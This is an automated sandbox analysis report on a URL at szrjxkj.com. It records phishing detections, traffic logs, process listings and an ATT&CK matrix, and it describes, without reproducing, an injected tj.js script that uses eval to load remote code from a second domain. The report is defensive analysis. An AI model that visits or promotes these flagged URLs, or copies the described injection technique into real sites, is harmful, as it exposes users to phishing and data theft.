Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://szrjxkj.com/dongtai/8622.html

Overview

General Information

Sample URL:http://szrjxkj.com/dongtai/8622.html
Analysis ID:1637090
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

  • System is w10x64
  • chrome.exe (PID: 1844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,17615637402213237854,2665322888663508983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2268 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://szrjxkj.com/dongtai/8622.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://szrjxkj.com/dongtai/8622.htmlAvira URL Cloud: detection malicious, Label: phishing
Source: http://szrjxkj.com/skin/js/bootstrap.min.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/tj.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/images/download-bgshape.pngAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/images/logo-footer.pngAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/js/main.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/images/footer-bgshape.pngAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/js/modernizr-3.6.0.min.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/js/jquery.min.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/css/plugins.cssAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/favicon.icoAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/js/plugins.jsAvira URL Cloud: Label: phishing
Source: https://szrjxkj.com/dongtai/8622.htmlAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0Avira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/css/bootstrap.min.cssAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/images/logo-white.pngAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/js/popper.min.jsAvira URL Cloud: Label: phishing
Source: http://szrjxkj.com/skin/css/style.cssAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: http://szrjxkj.com/tj.js... This script demonstrates high-risk behavior by using the `eval()` function to execute dynamic code, which can be used to run malicious scripts. Additionally, the script is writing a `<script>` tag to the document, which can be used to load external scripts from an untrusted domain (`oudngmslhifnsf.gdmgcyy.com`). This combination of dynamic code execution and loading external scripts from an unknown source indicates a high risk of malicious intent.
Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oudngmslhifnsf.gdmgcyy.com/tj.js... This script demonstrates several high-risk behaviors, including dynamic code execution using `eval()`, data exfiltration by sending user data to an external domain, and the use of obfuscated code. The script also attempts to detect and target mobile devices, which is a common tactic for malicious scripts. Overall, this script exhibits a high level of suspicious and potentially malicious behavior.
Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script demonstrates high-risk behavior by dynamically executing remote code from an obfuscated and potentially malicious domain, which poses a significant security risk.
Source: unknownHTTPS traffic detected: 156.224.2.38:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.99
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /dongtai/8622.html HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJShywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCK3ezgEIiuDOAQiu5M4BCOfkzgEIi+XOAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dongtai/8622.html HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /skin/css/bootstrap.min.css HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/css/plugins.css HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/css/style.css HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tj.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/logo-white.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/download-bgshape.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/footer-bgshape.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/logo-footer.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/modernizr-3.6.0.min.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/jquery.min.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/logo-white.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/popper.min.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/download-bgshape.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/bootstrap.min.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/plugins.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/js/main.js HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/logo-footer.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/images/footer-bgshape.png HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0 HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Origin: http://szrjxkj.comAccept: */*Referer: http://szrjxkj.com/skin/css/plugins.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: szrjxkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://szrjxkj.com/dongtai/8622.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: szrjxkj.com
Source: global trafficDNS traffic detected: DNS query: oudngmslhifnsf.gdmgcyy.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 13 Mar 2025 09:53:50 GMTContent-Type: text/htmlContent-Length: 148Connection: keep-aliveETag: "6752678f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiEyp8kv8JHgFVrJJfecg.woff2)
Source: chromecache_78.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v22/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAT-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAX-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAb-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAf-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAj-kw.wo
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAv-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAz-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuGb-k2Qn.
Source: chromecache_83.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuHT-k2Qn.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 156.224.2.38:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1844_909883180Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1844_909883180Jump to behavior
Source: classification engineClassification label: mal60.win@21/52@12/5
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,17615637402213237854,2665322888663508983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2268 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://szrjxkj.com/dongtai/8622.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,17615637402213237854,2665322888663508983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2268 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
